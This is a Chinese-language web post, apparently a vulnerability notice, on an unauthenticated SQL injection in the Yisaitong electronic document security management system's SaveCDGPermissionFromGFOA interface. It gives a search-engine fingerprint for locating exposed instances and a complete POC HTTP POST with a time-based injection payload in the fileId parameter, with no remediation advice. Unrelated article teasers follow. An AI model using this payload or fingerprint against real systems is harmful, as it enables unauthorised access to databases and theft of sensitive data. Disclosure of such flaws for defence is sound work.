SQL注入漏洞

guozi • 2024年6月5日下午3:19 • 行业资讯

漏洞信息

由于亿赛通电子文档安全管理系统SaveCDGPermissionFromGFOA处fileID对传入的数据没有预编译和充足的校验，导致该接口存在SQL注入漏洞，未授权的攻击者可获取数据库敏感信息。

漏洞信息

漏洞复现

复现信息

语法：

app='亿赛通-电子文档安全管理系统'

测绘搜索

POC：

POST /CDGServer3/js/../SaveCDGPermissionFromGFOA HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Length: 39Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencoded
fileId=1';WAITFOR DELAY '0:0:2'--&pis=1

漏洞复现

复现信息

复现-1

复现-2

更多内容

发现更多

原创文章，作者：guozi，如若转载，请注明出处：https://www.sudun.com/ask/90243.html

赞 (0)

0 0

要避免的 9 个 SQL 错误

上一篇 2024年6月5日下午3:02

SqlSugar，就这个Feel 倍儿爽！

下一篇 2024年6月5日下午3:20

网站被攻击了可以报警吗，网站被攻击有什么表现

您的网站是否被攻击过？这是困扰很多网站管理者和站长的问题。毕竟，网站一旦遭到攻击，不仅会给用户带来不便，还会造成重大的财产损失。那么，我的网站为什么会受到攻击呢？当我发现我的网站受…

牛晓晓
行业资讯 2024年5月17日
00
seouleaguer什么意思

你是否经常在网上搜索关键词时，会看到一些陌生的术语，比如seouleaguer？那么，seouleaguer到底是什么意思呢？它与搜索引擎优化（SEO）有什么关系？如果你对这个名词…

牛晓晓
行业资讯 2024年3月22日
00
如何利用seo排名工具网站提升网站的搜索引擎排名？

想要让自己的网站在搜索引擎中脱颖而出，吸引更多的流量和用户？那么你一定不能错过SEO排名工具网站！这些工具可以帮助你轻松提升网站的搜索引擎排名，让你的网站更容易被用户发现。但是，什…

牛晓晓
行业资讯 2024年3月22日
00
北京vps

云服务器行业近年来发展迅速，各大厂商纷纷推出自己的产品。其中，北京VPS作为国内领先的云服务器服务商，备受关注。但是，你知道什么是VPS吗？它有哪些特点和优势？价格又如何标准？如何…

牛晓晓
行业资讯 2024年3月28日
00

发表回复